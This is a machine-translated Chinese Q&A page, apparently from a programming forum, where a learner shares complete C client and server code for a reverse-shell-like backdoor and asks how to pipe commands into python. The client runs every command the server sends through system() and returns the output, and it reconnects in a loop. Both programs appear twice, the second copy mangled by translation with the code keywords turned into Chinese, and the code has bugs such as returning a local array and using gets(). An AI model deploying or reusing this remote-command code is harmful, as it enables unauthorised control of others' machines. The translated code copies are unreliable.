通过C语言中的system()函数在python命令行中执行命令
我在学习C语言,我喜欢安全性,然后我尝试创建一个类似于反向shell的东西,一个我可以通过服务器在客户端执行命令的套接字。有些命令的工作方式类似于“ls”,但类似于“python”的命令在客户端启动python并等待命令,但我无法向python发送命令,因为服务器正在等待客户端的响应发送下一个命令。如何解决这个问题并向python发送命令?您可以测试代码,只需编译和测试ls和python命令。 任何关于代码的建议都是受欢迎的,就像我在服务器上查看结果的方式一样。我正在创建一个文件,然后读取行。你会怎么做 客户:通过C语言中的system()函数在python命令行中执行命令,c,sockets,command-line,C,Sockets,Command Line,我在学习C语言,我喜欢安全性,然后我尝试创建一个类似于反向shell的东西,一个我可以通过服务器在客户端执行命令的套接字。有些命令的工作方式类似于“ls”,但类似于“python”的命令在客户端启动python并等待命令,但我无法向python发送命令,因为服务器正在等待客户端的响应发送下一个命令。如何解决这个问题并向python发送命令?您可以测试代码,只需编译和测试ls和python命令。 任何关于代码的建议都是受欢迎的,就像我在服务器上查看结果的方式一样。我正在创建一个文件,然后读取行。你
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
#define BUFSIZE 256
short SocketCreate(void)
{
short hSocket;
hSocket = socket(AF_INET, SOCK_STREAM, 0);
return hSocket;
}
int SocketConnect(int hSocket)
{
int iRetval = -1, ServerPort = 1001;
struct sockaddr_in remote = {0};
remote.sin_addr.s_addr = inet_addr("127.0.0.1");
remote.sin_family = AF_INET;
remote.sin_port = htons(ServerPort);
iRetval = connect(hSocket, (struct sockaddr *)&remote, sizeof(struct sockaddr_in));
return iRetval;
}
int SocketSend(int hSocket, char *Rqst, short lenRqst)
{
int shortRetval = -1;
struct timeval tv;
tv.tv_sec = 20;
tv.tv_usec = 0;
if (setsockopt(hSocket, SOL_SOCKET, SO_KEEPALIVE, (char *)&tv, sizeof(tv)) < 0)
{
printf("Time Out\n");
return -1;
}
shortRetval = send(hSocket, Rqst, lenRqst, 0);
return shortRetval;
}
char *ExecCommand(char *command)
{
char buf[BUFSIZE], result[9999] = {0};
strcpy(result, "");
strcat(command, " >> /tmp/malwaretest");
system(command);
FILE *fp = fopen("/tmp/malwaretest", "r");
while (fgets(buf, BUFSIZE - 1, fp))
{
strcat(result, buf);
}
return result;
}
char *SocketReceive(int hSocket, char *Rsp, short RvcSize)
{
struct timeval tv;
tv.tv_sec = 10;
tv.tv_usec = 0;
char result[9999] = {0};
if (setsockopt(hSocket, SOL_SOCKET, SO_KEEPALIVE, (char *)&tv, sizeof(tv)) < 0)
{
printf("Time Out\n");
return "";
}
recv(hSocket, Rsp, RvcSize, 0);
printf("RECEIVE %s\n", Rsp);
strcpy(result, ExecCommand(Rsp));
return result;
}
int ContinuousConnection()
{
int hSocket;
char SendToServer[9999] = "\n", server_reply[9999] = {0}, result[9999] = {0};
hSocket = SocketCreate();
if (hSocket == -1)
{
printf("Could not create socket\n");
}
if (SocketConnect(hSocket) < 0)
{
perror("connect failed.\n");
sleep(5);
}
SocketSend(hSocket, SendToServer, strlen(SendToServer));
strcpy(result, SocketReceive(hSocket, server_reply, 9999));
if (SocketSend(hSocket, result, strlen(result)) < 0)
{
printf("Send failed");
system("rm -rf /tmp/malwaretest");
}
system("rm -rf /tmp/malwaretest");
close(hSocket);
// shutdown(hSocket, 0);
// shutdown(hSocket, 1);
// shutdown(hSocket, 2);
ContinuousConnection();
}
int main(int argc, char *argv[])
{
ContinuousConnection();
return 0;
}
#包括
#包括
#包括
#包括
#包括
#包括
#定义bufsize256
短SocketCreate(void)
{
短hSocket;
hSocket=socket(AF_INET,SOCK_STREAM,0);
返回hSocket;
}
int插座连接(int hSocket)
{
int-iRetval=-1,ServerPort=1001;
远程中的结构sockaddr_={0};
remote.sin_addr.s_addr=inet_addr(“127.0.0.1”);
remote.sin_family=AF_INET;
remote.sin_port=htons(服务器端口);
iRetval=connect(hSocket,(struct sockaddr*)和remote,sizeof(struct sockaddr_in));
返回iRetval;
}
int-SocketSend(int-hSocket,char*Rqst,short-lenRqst)
{
int shortRetval=-1;
结构时间值电视;
tv.tv_sec=20;
tv.tv_usec=0;
if(setsockopt(hSocket,SOL_SOCKET,SO_KEEPALIVE,(char*)和tv,sizeof(tv))<0)
{
printf(“超时\n”);
返回-1;
}
shortRetval=send(hSocket,Rqst,lenRqst,0);
返回shortRetval;
}
char*ExecCommand(char*command)
{
char buf[BUFSIZE],result[9999]={0};
strcpy(结果“”);
strcat(命令“>>/tmp/malwaretest”);
系统(指挥部);
文件*fp=fopen(“/tmp/malwaretest”,“r”);
而(fgets(buf,BUFSIZE-1,fp))
{
strcat(结果,buf);
}
返回结果;
}
char*SocketReceive(int-hSocket,char*Rsp,short-RvcSize)
{
结构时间值电视;
tv.tv_sec=10;
tv.tv_usec=0;
字符结果[9999]={0};
if(setsockopt(hSocket,SOL_SOCKET,SO_KEEPALIVE,(char*)和tv,sizeof(tv))<0)
{
printf(“超时\n”);
返回“”;
}
recv(hSocket,Rsp,RvcSize,0);
printf(“接收%s\n”,Rsp);
strcpy(结果,执行命令(Rsp));
返回结果;
}
int ContinuousConnection()
{
int hSocket;
char SendToServer[9999]=“\n”,server_reply[9999]={0},result[9999]={0};
hSocket=SocketCreate();
如果(hSocket==-1)
{
printf(“无法创建套接字\n”);
}
if(插座连接(hs插座)<0)
{
perror(“连接失败。\n”);
睡眠(5);
}
SocketSend(hSocket、SendToServer、strlen(SendToServer));
strcpy(结果,SocketReceive(hSocket,server_reply,9999));
if(SocketSend(hSocket,result,strlen(result))<0)
{
printf(“发送失败”);
系统(“rm-rf/tmp/malwaretest”);
}
系统(“rm-rf/tmp/malwaretest”);
关闭(hSocket);
//停机(hSocket,0);
//停机(hSocket,1);
//停机(hSocket,2);
连续连接();
}
int main(int argc,char*argv[])
{
连续连接();
返回0;
}
服务器:
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
short SocketCreate(void)
{
short hSocket;
printf("Create the socket\n");
hSocket = socket(AF_INET, SOCK_STREAM, 0);
return hSocket;
}
int SocketReceive(int sock)
{
char client_message[9999] = {0}, message[9999] = {0};
memset(client_message, '\0', sizeof(client_message));
memset(message, '\0', sizeof(message));
if (recv(sock, client_message, 9999, 0) < 0)
{
printf("recv failed");
return 0;
}
printf("> ");
gets(message);
if (send(sock, message, strlen(message), 0) < 0)
{
printf("Send failed");
}
if (recv(sock, client_message, 9999, 0) < 0)
{
printf("recv failed");
return 0;
}
printf("%s", client_message);
}
int BindCreatedSocket(int hSocket)
{
int iRetval = -1, ClientPort = 1001;
struct sockaddr_in remote = {0};
remote.sin_family = AF_INET;
remote.sin_addr.s_addr = htonl(INADDR_ANY);
remote.sin_port = htons(ClientPort);
iRetval = bind(hSocket, (struct sockaddr *)&remote, sizeof(remote));
return iRetval;
}
int main(int argc, char *argv[])
{
int socket_desc, sock, clientLen;
struct sockaddr_in client;
socket_desc = SocketCreate();
if (socket_desc == -1)
{
printf("Could not create socket");
return 1;
}
if (BindCreatedSocket(socket_desc) < 0)
{
perror("bind failed.");
return 1;
}
listen(socket_desc, 3);
while (1)
{
clientLen = sizeof(struct sockaddr_in);
sock = accept(socket_desc, (struct sockaddr *)&client, (socklen_t *)&clientLen);
if (sock < 0)
{
perror("accept failed");
return 1;
}
SocketReceive(sock);
}
return 0;
}
#包括
#包括
#包括
#包括
#包括
短SocketCreate(void)
{
短hSocket;
printf(“创建套接字\n”);
hSocket=socket(AF_INET,SOCK_STREAM,0);
返回hSocket;
}
int SocketReceive(int sock)
{
char client_message[9999]={0},message[9999]={0};
memset(客户端消息'\0',sizeof(客户端消息));
memset(消息'\0',sizeof(消息));
if(recv(sock,client_message,9999,0)<0)
{
printf(“recv失败”);
返回0;
}
printf(“>”);
获取(消息);
如果(发送(sock,message,strlen(message),0)<0)
{
printf(“发送失败”);
}
if(recv(sock,client_message,9999,0)<0)
{
printf(“recv失败”);
返回0;
}
printf(“%s”,客户端消息);
}
int BindCreatedSocket(int hsSocket)
{
int-iRetval=-1,ClientPort=1001;
远程中的结构sockaddr_={0};
remote.sin_family=AF_INET;
remote.sin_addr.s_addr=htonl(INADDR_ANY);
remote.sin_port=htons(ClientPort);
iRetval=bind(hSocket,(struct sockaddr*)&remote,sizeof(remote));
返回iRetval;
}
int main(int argc,char*argv[])
{
内部插座描述,插座,客户;
客户端中的结构sockaddr_;
socket_desc=SocketCreate();
如果(套接字描述==-1)
{
printf(“无法创建套接字”);
返回1;
}
如果(BindCreatedSocket(套接字描述)<0)
{
perror(“绑定失败”);
返回1;
}
听(插座描述,3);
而(1)
{
clientLen=sizeof(结构sockaddr\u in);
sock=accept(socket\u desc,(struct sockaddr*)和client,(socklen\u t*)和clientLen);
if(sock<0)
{
perror(“接受失败”);
返回1;
}
SocketReceive(sock);
}
返回0;
}
这是常见的常见问题解答。您需要将子流程的stdin连接到希望它从中读取命令的任何流,类似地,还需要将stdout和stderr连接到输出。